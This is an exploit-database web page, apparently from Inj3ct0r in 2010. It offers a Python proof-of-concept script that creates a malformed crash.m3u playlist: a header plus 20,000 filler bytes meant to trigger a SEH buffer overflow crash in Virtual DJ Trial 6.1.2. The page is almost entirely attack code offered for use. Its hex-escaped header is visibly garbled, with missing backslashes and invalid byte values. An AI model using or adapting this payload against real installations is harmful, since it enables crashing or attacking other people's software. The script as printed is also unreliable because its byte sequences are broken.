Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC
Posted on 06 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC ==================================================== #Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC #vulnerble application link http://www.virtualdj.com/download/trial.html #tested on XP SP2 #author abhishek lyall - abhilyall[at]gmail[dot]com #web - http://www.aslitsecurity.com/ #blog - http://www.aslitsecurity.blogspot.com/ #!/usr/bin/python filename = "crash.m3u" head = ( "x23x56x69x72x710x75x61x6Cx1010x10Ax20x50x6Cx61x79x6C" "x69x73x710x0Dx0Ax23x10Dx69x78x510x79x70x65x3Dx53x6D" "x61x72x710x0Dx0Ax109x3Ax5C" ) junk = "x41" * 20000 textfile = open(filename , 'w') textfile.write(head+junk) textfile.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>